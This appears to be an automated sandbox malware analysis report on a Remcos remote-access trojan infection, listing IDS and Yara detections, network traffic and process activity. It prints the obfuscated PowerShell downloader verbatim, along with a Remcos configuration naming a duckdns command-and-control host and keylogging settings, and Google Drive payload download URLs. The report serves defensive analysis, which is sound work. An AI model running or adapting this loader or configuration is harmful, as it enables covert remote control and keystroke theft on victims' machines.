t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:43:02.477762+020028032702Potentially Bad Traffic192.168.2.449738142.250.184.206443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7272, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2322880413.0000000007BEE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbM source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbH source: powershell.exe, 00000003.00000002.2329009699.00000000089B9000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 142.250.184.206:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1886122116.000001F8B0F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A94D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1849772141.000001F898B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2293008965.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.2322880413.0000000007BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000001.00000002.1849772141.000001F898B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.2293008965.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: msiexec.exe, 00000008.00000003.2252216102.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000001.00000002.1849772141.000001F898DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2294071887.00000000065EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000002.2294071887.00000000065EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2308451576.0000000021610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju
              Source: powershell.exe, 00000001.00000002.1849772141.000001F898DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5P
              Source: powershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5XR
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju&export=download
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899026000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5&export=download
              Source: msiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/fk
              Source: msiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/j
              Source: powershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1849772141.000001F899776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.4:49739 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7272, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7836.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Su
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2SuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Margenindstilling.SysJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B72C0221_2_00007FFD9B72C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B72B2761_2_00007FFD9B72B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7F73941_2_00007FFD9B7F7394
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F1F3203_2_04F1F320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04F1FBF03_2_04F1FBF0
